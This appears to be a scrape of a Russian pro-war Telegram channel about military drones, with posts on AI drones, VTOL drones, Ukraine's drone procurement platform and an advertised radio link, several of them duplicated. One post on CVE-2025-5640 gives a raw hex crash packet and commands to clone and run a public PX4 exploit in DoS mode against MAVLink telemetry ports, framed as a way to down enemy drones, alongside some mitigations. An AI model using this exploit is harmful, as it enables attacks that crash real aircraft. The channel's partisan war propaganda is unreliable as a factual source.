Forwarded from КЦПН. Координационный Центр Помощи Новороссии.
CSIS_Война_беспилотников_между_Россией_и_Украиной_Инновации_на_фронте.pdf
12.2 MB
👹Участники мероприятия – люди довольно маститые и глубоко погружённые в эту тематику. Это Грегори К. Аллен – директор центра ИИ им. Вадхвание; Сэмюэль Бендетт – эксперт по военным технологиям России. Конечно же, не обошлись без Катерины Бондарь – уроженки Украины, научного сотрудника канадского филиала разведки и безопасности CSIS. Она давно изучает нас и является автором многих работ и докладов по нашим инновациям, таких как «Внутри российского плана по созданию автономных роёв беспилотников». По совместительству она матёра русофобка
На этом мероприятии обсуждались следующие темы
🔸Война нового типа, в которой дроны заменяют артиллерию. Беспилотники уже не просто разведка — они выполняют ударные миссии, логистические задачи и даже заменяют традиционные артиллерийские снаряды. Особенно актуально это в условиях дефицита боеприпасов. Также они – ключевой элемент тактики
🔸Украинский подход. «Зоопарк технологий» и креативность. Разные производители создают несовместимые системы («зоопарк»), что усложняет управление. Украина работает над стандартизацией, чтобы объединить технологии в единую сеть. Ключевой принцип Киева — гибкость: использование коммерческих компонентов (ховерборды, дешевые камеры) и адаптация под полевые условия
🔸Российская стратегия. От хаоса к системному подходу. Россия изначально отставала, но теперь активно копирует и дорабатывает украинский опыт. В ходе беседы глубоко анализируются наши преимущества и проблемы
🔶Технологические вызовы. ИИ, автономность и будущее. Сейчас ИИ применяется в основном для обработки данных (например, распознавание целей на видео). Полностью автономные дроны пока не готовы к бою из-за проблем с точностью и управлением. Эксперта сошлись в том, что человек-оператор остается ключевым. Даже при терминальном наведении решение об ударе принимает человек, а не алгоритм. Если конфликт продлится 5 лет, Украина и Россия могут выйти на новый уровень автономных систем. Однако это потребует решения этических и технических вопросов
🔸Уроки войны. Что изменится в будущем? Опыт Украины и России повлияет на военные доктрины по всему миру. Электронная война и физическое уничтожение дронов станут стандартом. Россия уже внедряет UGV для минирования и разминирования. Побеждает тот, кто может быстро и массово производить и модернизировать дроны
🔸Война как лаборатория инноваций. Конфликт на Украине стал полигоном для испытания дронов. Эксперты отмечают, что технологии уже не вернутся в прежнее состояние. В будущем войны будут зависеть не от количества танков, а от способности интегрировать ИИ, создавать дешёвые автономные системы и противостоять вражеским дронам
Недаром военная мудрость, написанная кровью, гласит: «Либо ты учишься и развиваешься, либо ты убит». И это как никогда актуально применительно не только к конкретному бойцу, но и ко всей стране в целом
Cogito ergo vinco
МЫСЛЮ, СЛЕДОВАТЕЛЬНО, ПОБЕЖДАЮ!
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔3✍1
『Российские дроны с ИИ』
Техническая эволюция идентификации вражеских целей
🇷🇺 БПЛА с успешно интегрированным ИИ:
«Русак-С» — дрон-камикадзе
«Микроб» — дрон-камикадзе
«Молния» — ударный дрон
«Орлан» — разведовательный БПЛА
«Ланцет» — барражирующий боеприпас
Список неполный из-за ограниченной информации в интернете про военные разработки, но подобных дронов точно больше как производится так и тестируется.
🙂 🙂 🙂 🙂 🙂 🙂 🙂 🙂 🙂
Дроны с ИИ - это оружие будущего.
Благо что в этом направлении мы не отстаём от мира или украины, а сами задаём темп и новые стандарты в рамках СВО.
⭐️ Полезная Нагрузка
Техническая эволюция идентификации вражеских целей
Искусственный интеллект позволяет боевым беспилотникам самостоятельно распознавать цели и определять их приоритет.🙂 Если дрон потеряет связь с оператором из-за вражеского РЭБа, он всё равно автономно полетит к цели.🙂 ИИ также может применяться гражданскими дронами, например, для поиска пропавших людей.
🇷🇺 БПЛА с успешно интегрированным ИИ:
«Русак-С» — дрон-камикадзе
«Микроб» — дрон-камикадзе
«Молния» — ударный дрон
«Орлан» — разведовательный БПЛА
«Ланцет» — барражирующий боеприпас
Дроны с ИИ - это оружие будущего.
Благо что в этом направлении мы не отстаём от мира или украины, а сами задаём темп и новые стандарты в рамках СВО.
Please open Telegram to view this post
VIEW IN TELEGRAM
🫡3❤🔥1😍1
『Российские дроны с VTOL』
Почему их так мало?
🖍 Исторически сложилось, что самолеты с технологией вертикального взлета и посадки (VTOL) разрабатываются и используются странами для морского флота, в частности для авианосцев. После распада Советского Союза у Российской Федерации остался только один авианосец — «Адмирал Кузнецов», который в настоящее время не боеспособен и находится в длительном ремонте.
🚩 В связи с этим разработка дорогостоящих и технологически сложных узкоспециализированных VTOL-самолетов не имеет практического смысла.
Вместо этого Россия сфокусировалась на традиционных самолётах, которые дешевле и эффективнее.
🙂 🙂 🙂 🙂 🙂 🙂 🙂 🙂 🙂 🙂 🙂
А причём тут дроны?
🙂 Однако в зоне СВО сейчас проходит испытания VTOL-дрон — «Воган-9СП», одноразового дрона-перехватчика.
Он способен к вертикальному взлету и посадке (VTOL), после чего переходит в горизонтальный полет, как самолет.
🙂 Это уникальный пример применения технологии VTOL в условиях СВО.
🙂 Технические характеристики и эффективность дрона пока сложно оценить, но мы будем внимательно следить за его дальнейшей судьбой.
🙂 🙂 🙂 🙂 🙂 🙂 🙂 🙂 🙂 🙂 🙂
Подобные инновации позволяют России задавать тренды и устанавливать свои правила игры, что значительно эффективнее, чем следовать чужим стандартам.
Аналогичных VTOL дронов в мире крайне мало.
⭐️ Полезная Нагрузка
Почему их так мало?
Технология VTOL (Vertical Take-Off and Landing) для дронов позволяет выполнять вертикальный взлет и посадку, как у вертолета, без необходимости в взлетно-посадочной полосе, а также переходить в горизонтальный полет, как у самолета, для большей дальности и эффективности. Обычно реализуется через гибридные системы (электрические роторы для взлета/посадки и маршевый двигатель для полета).
Примеры из мира самолётов -🇷🇺 Як-38 — палубный VTOL-истребитель
🇺🇸 F-35B — многоцелевой VTOL-истребитель
🇬🇧 AV-8B — VTOL-штурмовик
🇺🇸 V-22 Osprey — транспортный конвертоплан
(гибрид самолета и вертолета)
Вместо этого Россия сфокусировалась на традиционных самолётах, которые дешевле и эффективнее.
А причём тут дроны?
Ответ на вопрос, почему в России не применяют VTOL-дроны, схож с причинами прекращения производства VTOL-самолетов после 1991 года:
— Можно создавать более дешевые и эффективные решения без сложных технологий, типа специализированных двигателей.
Он способен к вертикальному взлету и посадке (VTOL), после чего переходит в горизонтальный полет, как самолет.
Подобные инновации позволяют России задавать тренды и устанавливать свои правила игры, что значительно эффективнее, чем следовать чужим стандартам.
Аналогичных VTOL дронов в мире крайне мало.
Please open Telegram to view this post
VIEW IN TELEGRAM
✍3😍1😎1
This media is not supported in your browser
VIEW IN TELEGRAM
『 Трамп дал приказ —
Дать старт американского военного беспилотного господства 』
Обращение министра обороны 🇺🇸 США, Пита Хегсета🙂
Это будущее. Мы вступаем в бой чтобы победить. Я никогда не отступлю. — мощный конец речибизнес-коуча министра обороны.
🙂 🙂 🙂 🙂 🙂 🙂 🙂 🙂
Видео в лучших традициях Голливуда: на лужайке перед Пентагоном дрон эффектно подаёт документ на подпись.
Но тех, кто следит за СВО, таким ребячеством не удивить — это театр для американской публики.
Лично я не хотел бы такой показухи в России, пусть лучше министры делами занимаются.
⭐️ Полезная Нагрузка
Дать старт американского военного беспилотного господства 』
Обращение министра обороны 🇺🇸 США, Пита Хегсета
Знаете что? Мы знаем, зачем нас сюда привели.
Мы сюда пришли, чтобы перестроить вооруженные силы, привести их потенциал в соответствие с сегодняшними угрозами.
Пока наши противники производили миллионы дешевых беспилотников до нас, мы погрязли в бюрократической волоките.
Теперь уже нет. В июне президент Трамп издал указ, развязывающий американское беспилотное господство.
Чтобы укрепить нашу беспилотную промышленность и вооружить наших бойцов, потому что в этом вся наша суть.
Поэтому сегодня я отменяю ограничительную политику, которая мешает производству, и это позволит высвободить американское производство и изобретательность наших бойцов, сделав три ключевые вещи.
Во-первых, мы укрепим производственную базу беспилотников в США, выпустив тысячи изделий американского производства.
Приоритет "Покупайте американское" для вооружения боевых подразделений различными экономически эффективными беспилотниками американского производства.
Используя наших ведущих мировых инженеров и экспертов по искусственному интеллекту. И в-третьих, мы будем тренироваться так же, как и воевать.
Старшие офицеры должны преодолеть бюрократическую неприязнь к риску при составлении бюджета, создании оружия и обучении. И вот меморандум, доставленный с помощью беспилотника на лужайку перед Пентагоном, на котором летают наши великие бойцы.
Это будущее. Мы вступаем в бой чтобы победить. Я никогда не отступлю. — мощный конец речи
Видео в лучших традициях Голливуда: на лужайке перед Пентагоном дрон эффектно подаёт документ на подпись.
Но тех, кто следит за СВО, таким ребячеством не удивить — это театр для американской публики.
Лично я не хотел бы такой показухи в России, пусть лучше министры делами занимаются.
Please open Telegram to view this post
VIEW IN TELEGRAM
😁4
Forwarded from ЦБСТ
«DOT-Chain Defence»: Украина запускает маркетплейс для прямых закупок FPV-дронов военными.
В июле 2025 года Министерство обороны Украины объявило о запуске пилотного проекта по централизованной закупке БПЛА через специализированную цифровую платформу DOT-Chain Defence. На начальном этапе в проекте примут участие 10 бригад ВСУ, которым выделено порядка $25 млн исключительно на приобретение FPV-дронов.
Этот проект — попытка создать военный маркетплейс вооружений, действующий по принципу электронной коммерции с возможностью выбора, оценки и обратной связи.
Как устроен DOT-Chain Defence — технически и организационно:
1. Фронт: бригады ВСУ
▪️Получают лимит на закупки (в рамках выделенного миллиарда).
▪️Могут выбирать из предложенных моделей БПЛА (в наличии и под заказ).
▪️Формируют заказы, отслеживают поставки, оставляют отзывы и претензии.
2. Производители дронов
▪️Размещают свою продукцию на платформе (характеристики, сроки, наличие).
▪️Обновляют данные в реальном времени.
▪️Осуществляют прямую отгрузку воинским частям (без посредников и складов).
3. Агентство оборонных закупок
▪️Централизует оплату заказов.
Контролирует логистику, собирает фидбек от бригад.
▪️Обеспечивает актуальность платформы.
Участники и масштаб:
▪️К участию допущены 80+ украинских производителей дронов, более 400 моделей БПЛА.
▪️В первые недели задействованы 15 компаний — их дроны доступны на платформе.
▪️Остальные поставщики будут подключены в течение месяца.
▪️Технологическую основу разработал офис BRDO (Better Regulation Delivery Office) — структура, курирующая цифровые реформы при участии западных фондов.
Интеграция с фронтовым приложением «Армія+»:
▪️Платформа будет синхронизирована с военным мобильным приложением.
▪️Подразделения смогут отправлять запросы на ремонт, обслуживание и техподдержку напрямую производителю.
▪️Все заявки пойдут в единую систему анализа боевого применения и надёжности техники.
Создание DOT-Chain Defence — это логичное продолжение платформы Brave1 Market, которая начала работать весной 2024 года как витрина украинских военных разработок. Однако текущий проект делает шаг дальше: он превращает армию в цифрового клиента, напрямую взаимодействующего с оборонной индустрией в режиме онлайн.
Это уже не просто закупка дронов, а:
▪️институционализация тактической дроновой войны;
▪️реализация прямого контракта «боец — разработчик»;
▪️формирование боевого рынка с отзывами, рейтингами и кастомизацией продукции под нужды конкретных бригад.
Существенный аспект: Украина тем самым формирует модель распределённого ВПК, где каждый малый производитель может выйти на фронт напрямую, минуя бюрократию. Такая система масштабируема, устойчива к ударам по логистике, адаптивна и экономически эффективна.
Стратегический вывод:
Украина, при поддержке западных ИТ-экспертов и структур, создаёт военно-экономическую модель XXI века, где дрон — это не только боевой модуль, но и единица информационно-платёжной системы, встроенной в цифровой оборонный рынок. В таких условиях борьба идёт не только на поле боя, но и в архитектуре организации производства и снабжения. И здесь ключевое преимущество получает та сторона, которая быстрее адаптирует гражданские технологии под боевые задачи.
@ano_cbst
В июле 2025 года Министерство обороны Украины объявило о запуске пилотного проекта по централизованной закупке БПЛА через специализированную цифровую платформу DOT-Chain Defence. На начальном этапе в проекте примут участие 10 бригад ВСУ, которым выделено порядка $25 млн исключительно на приобретение FPV-дронов.
Этот проект — попытка создать военный маркетплейс вооружений, действующий по принципу электронной коммерции с возможностью выбора, оценки и обратной связи.
Как устроен DOT-Chain Defence — технически и организационно:
1. Фронт: бригады ВСУ
▪️Получают лимит на закупки (в рамках выделенного миллиарда).
▪️Могут выбирать из предложенных моделей БПЛА (в наличии и под заказ).
▪️Формируют заказы, отслеживают поставки, оставляют отзывы и претензии.
2. Производители дронов
▪️Размещают свою продукцию на платформе (характеристики, сроки, наличие).
▪️Обновляют данные в реальном времени.
▪️Осуществляют прямую отгрузку воинским частям (без посредников и складов).
3. Агентство оборонных закупок
▪️Централизует оплату заказов.
Контролирует логистику, собирает фидбек от бригад.
▪️Обеспечивает актуальность платформы.
Участники и масштаб:
▪️К участию допущены 80+ украинских производителей дронов, более 400 моделей БПЛА.
▪️В первые недели задействованы 15 компаний — их дроны доступны на платформе.
▪️Остальные поставщики будут подключены в течение месяца.
▪️Технологическую основу разработал офис BRDO (Better Regulation Delivery Office) — структура, курирующая цифровые реформы при участии западных фондов.
Интеграция с фронтовым приложением «Армія+»:
▪️Платформа будет синхронизирована с военным мобильным приложением.
▪️Подразделения смогут отправлять запросы на ремонт, обслуживание и техподдержку напрямую производителю.
▪️Все заявки пойдут в единую систему анализа боевого применения и надёжности техники.
Создание DOT-Chain Defence — это логичное продолжение платформы Brave1 Market, которая начала работать весной 2024 года как витрина украинских военных разработок. Однако текущий проект делает шаг дальше: он превращает армию в цифрового клиента, напрямую взаимодействующего с оборонной индустрией в режиме онлайн.
Это уже не просто закупка дронов, а:
▪️институционализация тактической дроновой войны;
▪️реализация прямого контракта «боец — разработчик»;
▪️формирование боевого рынка с отзывами, рейтингами и кастомизацией продукции под нужды конкретных бригад.
Существенный аспект: Украина тем самым формирует модель распределённого ВПК, где каждый малый производитель может выйти на фронт напрямую, минуя бюрократию. Такая система масштабируема, устойчива к ударам по логистике, адаптивна и экономически эффективна.
Стратегический вывод:
Украина, при поддержке западных ИТ-экспертов и структур, создаёт военно-экономическую модель XXI века, где дрон — это не только боевой модуль, но и единица информационно-платёжной системы, встроенной в цифровой оборонный рынок. В таких условиях борьба идёт не только на поле боя, но и в архитектуре организации производства и снабжения. И здесь ключевое преимущество получает та сторона, которая быстрее адаптирует гражданские технологии под боевые задачи.
@ano_cbst
✍3
『 Свежий мануал армии США для танковых войск 』
Танкистов учат стрелять из основного орудия по дронам & подавать сигнал об атаке БПЛА с помощью размахивания руками.
🙂 🙂 🙂 🙂 🙂 🙂 🙂
Комментировать - только портить.
Похоже на псиоп, ну не могут же они быть такими дегенер*тами😔
⭐️ Полезная Нагрузка
Танкистов учат стрелять из основного орудия по дронам & подавать сигнал об атаке БПЛА с помощью размахивания руками.
Комментировать - только портить.
Похоже на псиоп, ну не могут же они быть такими дегенер*тами
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
😁3
Связь «Пеппа», показывающая результат!
Связь проявила себя на многих направлениях СВО, благодаря используемым нестандартным частотам и собственному шифрованному протоколу радиообмена, и показала свою эффективность.
Устанавливается на дроны крупных производителей БПЛА.
Доступны:
- проводной вынос со входом BNC для подключения НСУ 2.0 и более старших моделей;
- беспроводной вынос со штатным подключением приемников ELRS/TBS;
- легкий воздушный ретранслятор со штатным подключением приемников ELRS/TBS;
- пультовой модуль с возможностью подключения пультов управления по USB и работы с проводным выносом через кабель по интерфейсу RS-485.
Характеристики и комплектация:
- дальность связи подтверждена в боевых условиях до 30 км (до 100 км при использовании усилителя или ретрансляторов);
- устойчива к РЭБ, благодаря нестандартным частотам;
- все программное обеспечение собственной разработки;
- совместима с любым полетным контроллером по протоколу CRSF;
- приемники формируют показания RSSI и LQ;
- работает на частотах от 150 до 960МГц;
- выходная мощность без сторонних усилителей 2Вт;
- устойчивый к подмене и копиям пакетов протокол;
- надежное шифрование всего радио обмена алгоритмом AES128;
- позволяет работать рядом нескольким операторам БПЛА без взаимных помех.
Обзор противника на связь
Заказать специальную связь Пеппа
Связь проявила себя на многих направлениях СВО, благодаря используемым нестандартным частотам и собственному шифрованному протоколу радиообмена, и показала свою эффективность.
Устанавливается на дроны крупных производителей БПЛА.
Доступны:
- проводной вынос со входом BNC для подключения НСУ 2.0 и более старших моделей;
- беспроводной вынос со штатным подключением приемников ELRS/TBS;
- легкий воздушный ретранслятор со штатным подключением приемников ELRS/TBS;
- пультовой модуль с возможностью подключения пультов управления по USB и работы с проводным выносом через кабель по интерфейсу RS-485.
Характеристики и комплектация:
- дальность связи подтверждена в боевых условиях до 30 км (до 100 км при использовании усилителя или ретрансляторов);
- устойчива к РЭБ, благодаря нестандартным частотам;
- все программное обеспечение собственной разработки;
- совместима с любым полетным контроллером по протоколу CRSF;
- приемники формируют показания RSSI и LQ;
- работает на частотах от 150 до 960МГц;
- выходная мощность без сторонних усилителей 2Вт;
- устойчивый к подмене и копиям пакетов протокол;
- надежное шифрование всего радио обмена алгоритмом AES128;
- позволяет работать рядом нескольким операторам БПЛА без взаимных помех.
Обзор противника на связь
Заказать специальную связь Пеппа
❤1🔥1
CVE-2025-5640: "один пакет - минус дрон"
https://github.com/PX4/PX4-Autopilot/issues/24915
PX4 Autopilot до v1.12.3 содержит критичное переполнение стека при разборе MAVLink-сообщения
Что именно ломается
- Файл:
- Функция: handle_message_trajectory_representation_waypoints().
Буфер для waypoints лежит на стеке и меньше максимального размера сообщения; лишние байты переписывают соседнюю память - ядро гасит поток по SIGABRT
Как повторить атаку
1. Запустить PX4 SITL (jMAVSim).
2. Отправить “длинный” пакет - пример hex уже приведён в issue:
fdef0000dcea6f4c01006de9d06a0548182a1fcc8b7cc542eb8945a54baa92ee908db9af0195bb5dce5f9ab613be912485d34e577c352c5cdc06592484be1aecd64a07127bda31fc8f41f300a9e4a0eab80d8835f106924f0b89ece3e256dda30e3001f07df4e1633e6f827b7812731dbc3daf1e81fc06cea4d9c8c1525fb955d3eddd7454b54bb740bcd87b00063bd9111d4fb4149658d4ccd92974c97c7158189a8d6354242bdfcef1427429d762cbabe7d3bd9ad7b292fd206fecbc6bd8dee4422f129bb72794905979f8b369b415bacac087b028626846093354bca7cdf5b3aeca117b2f906e83e1fde3e5421fe6b689cd4f9359cdadc82086
3. Через пару секунд симулятор падает, что в боевых условиях означает потерю птички
Готовый инструмент.
https://github.com/mbanyamer/PX4-Military-UAV-Autopilot-1.12.3-Stack-Buffer-Overflow-Exploit-CVE-2025-5640-
Загрузим репозиторий и установим pymavlink для запуска скрипта.
PoC на питоне рассылает пакет по UDP 14540/14550:
Есть режим “check” для проверки живости птички(соединения)
Боевой эффект
- Для наших расчётов птичек: риск потерять разведывательный или ударный борт в момент выхода на цель.
- Для противника:дешёвый DoS без мощной РЭБ - достаточно маломощного SDR, попадающего в тот же диапазон связи.
VPN снижает, но не убирает угрозу. При глушении LTE/Starlink туннель рвётся и MAVLink идёт "чистым". Кроме того, RF-injection в 915 МГц или 2.4 ГГц происходит до TCP/IP-уровня, а значит пакет-убийца долетит, если сигнатура не фильтруется на радиомодеме
Чем закрываться
1. Обновиться. Хотел тут отметить, что версия 1.12.3(https://github.com/PX4/PX4-Autopilot/releases/tag/v1.12.3) вышла еще в сентябре 2021, было бы странно увидеть у себя её, однако от схожих проблем советую рекомендации ниже
2. Можно собрать с ASAN (
3. Включить MAVLink 2 + signing (
4. Фильтрация Msg 332 и схожих на прокси (MAVProxy/Router) или в коде
5. Закрыть порты телеметрии за файрволом, отделять трафик в отдельный VLAN/меш, отслеживать обрывы впн.
6. Настройка фэйлсейф на "RTL -> Land" вместо зависания: падение процесса не должно превращать аппарат в стационарную мишень.
При просмотре mavlink_receiver.cpp в свежих версиях, там не оказалось обработки сообщения с идентификатором MAVLINK_MSG_ID_TRAJECTORY_REPRESENTATION_WAYPOINTS (332) и не включает уязвимую функцию handle_message_trajectory_representation_waypoints
Вместо заключения: CVE-2025-5640 показывает, что иногда легче “выстрелить” пакетом, чем жечь ваттами помех.
https://github.com/PX4/PX4-Autopilot/issues/24915
PX4 Autopilot до v1.12.3 содержит критичное переполнение стека при разборе MAVLink-сообщения
TRAJECTORY_REPRESENTATION_WAYPOINTS (Msg ID 332). Достаточно одной сформированной датаграммы, чтобы процесс mavlink_receiver упал, а птичка перешла в фэйлсейв или полностью потеряла управлениеЧто именно ломается
- Файл:
src/modules/mavlink/mavlink_receiver.cpp- Функция: handle_message_trajectory_representation_waypoints().
Буфер для waypoints лежит на стеке и меньше максимального размера сообщения; лишние байты переписывают соседнюю память - ядро гасит поток по SIGABRT
Как повторить атаку
1. Запустить PX4 SITL (jMAVSim).
2. Отправить “длинный” пакет - пример hex уже приведён в issue:
fdef0000dcea6f4c01006de9d06a0548182a1fcc8b7cc542eb8945a54baa92ee908db9af0195bb5dce5f9ab613be912485d34e577c352c5cdc06592484be1aecd64a07127bda31fc8f41f300a9e4a0eab80d8835f106924f0b89ece3e256dda30e3001f07df4e1633e6f827b7812731dbc3daf1e81fc06cea4d9c8c1525fb955d3eddd7454b54bb740bcd87b00063bd9111d4fb4149658d4ccd92974c97c7158189a8d6354242bdfcef1427429d762cbabe7d3bd9ad7b292fd206fecbc6bd8dee4422f129bb72794905979f8b369b415bacac087b028626846093354bca7cdf5b3aeca117b2f906e83e1fde3e5421fe6b689cd4f9359cdadc82086
3. Через пару секунд симулятор падает, что в боевых условиях означает потерю птички
Готовый инструмент.
https://github.com/mbanyamer/PX4-Military-UAV-Autopilot-1.12.3-Stack-Buffer-Overflow-Exploit-CVE-2025-5640-
Загрузим репозиторий и установим pymavlink для запуска скрипта.
$ git clone https://github.com/mbanyamer/PX4-Military-UAV-Autopilot-1.12.3-Stack-Buffer-Overflow-Exploit-CVE-2025-5640- PX4_CVE-2025-5640
$ cd PX4_CVE-2025-5640
$ pip install pymavlink
PoC на питоне рассылает пакет по UDP 14540/14550:
python3 px4_military_exploit.py --mode dos
Есть режим “check” для проверки живости птички(соединения)
python3 px4_military_exploit.py --mode check --ip 192.168.10.10 --port 14550
Боевой эффект
- Для наших расчётов птичек: риск потерять разведывательный или ударный борт в момент выхода на цель.
- Для противника:дешёвый DoS без мощной РЭБ - достаточно маломощного SDR, попадающего в тот же диапазон связи.
VPN снижает, но не убирает угрозу. При глушении LTE/Starlink туннель рвётся и MAVLink идёт "чистым". Кроме того, RF-injection в 915 МГц или 2.4 ГГц происходит до TCP/IP-уровня, а значит пакет-убийца долетит, если сигнатура не фильтруется на радиомодеме
Чем закрываться
1. Обновиться. Хотел тут отметить, что версия 1.12.3(https://github.com/PX4/PX4-Autopilot/releases/tag/v1.12.3) вышла еще в сентябре 2021, было бы странно увидеть у себя её, однако от схожих проблем советую рекомендации ниже
2. Можно собрать с ASAN (
make px4_sitl_default clang_asan) - ловит подобные баги до вылета в бою.3. Включить MAVLink 2 + signing (
MAV_0_SIGNING=1) - неподписанные пакеты будут отброшены.4. Фильтрация Msg 332 и схожих на прокси (MAVProxy/Router) или в коде
5. Закрыть порты телеметрии за файрволом, отделять трафик в отдельный VLAN/меш, отслеживать обрывы впн.
6. Настройка фэйлсейф на "RTL -> Land" вместо зависания: падение процесса не должно превращать аппарат в стационарную мишень.
При просмотре mavlink_receiver.cpp в свежих версиях, там не оказалось обработки сообщения с идентификатором MAVLINK_MSG_ID_TRAJECTORY_REPRESENTATION_WAYPOINTS (332) и не включает уязвимую функцию handle_message_trajectory_representation_waypoints
Вместо заключения: CVE-2025-5640 показывает, что иногда легче “выстрелить” пакетом, чем жечь ваттами помех.
✍1
Forwarded from Потапов. АО «НПП».
IP-V-Encoder_v1.pdf
19.6 KB
Очень интересные документы противника.
https://silvustechnologies.com/products/streamcaster-radios/
Находиться за 120км от ЛБС в комфортных условиях, выполняя задачу…хочется верить, что мы работаем над спутниковой связью и рассчитываем не только на 5-15км. и «чудесную» оптику.
Потапов. Подписаться ✅
https://silvustechnologies.com/products/streamcaster-radios/
Находиться за 120км от ЛБС в комфортных условиях, выполняя задачу…хочется верить, что мы работаем над спутниковой связью и рассчитываем не только на 5-15км. и «чудесную» оптику.
Потапов. Подписаться ✅